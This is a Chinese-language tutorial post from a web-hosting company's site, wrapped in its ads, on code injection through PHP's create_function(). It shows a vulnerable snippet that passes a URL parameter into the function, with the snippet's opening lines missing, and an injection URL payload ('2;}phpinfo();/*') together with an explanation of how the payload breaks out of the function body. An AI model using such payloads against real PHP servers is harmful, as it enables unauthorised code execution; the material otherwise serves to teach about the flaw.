第一部分：介绍php函数 create_function()：

创新互联建站主营梅州网站建设的网络公司,主营网站建设方案,成都app开发,梅州h5小程序制作搭建,梅州网站营销推广欢迎梅州等地区企业咨询

string create_function   ( string $args  , string $code  )

string $args变量部分

string $code 方法代码部分

举例：

create_function('$fname','echo $fname."Zhang"')

类似于：

function fT($fname) {   echo $fname."Zhang"; }

举一个官方提供的例子：

第二部分：如何利用create_function(）代码注入

测试环境版本：

apache +php 5.2、apache +php 5.3

有问题的代码：

"; echo "=============================="; echo "
"; $f1 = create_function('$a',$str2); echo "
"; echo "=============================="; ?>

利用方法：

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

实现原理：

由于id=2;}phpinfo();/*

执行函数为：

源代码： function fT($a) {   echo "test".$a; } 注入后代码： function fT($a) {   echo "test";}   phpinfo();/*;//此处为注入代码。 }

测试效果：

另外有需要云服务器可以了解下创新互联cdcxhl.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

当前题目：PHPcreate_function()代码注入-创新互联
URL链接：http://chengdu.cdxwcx.cn/article/cddeoi.html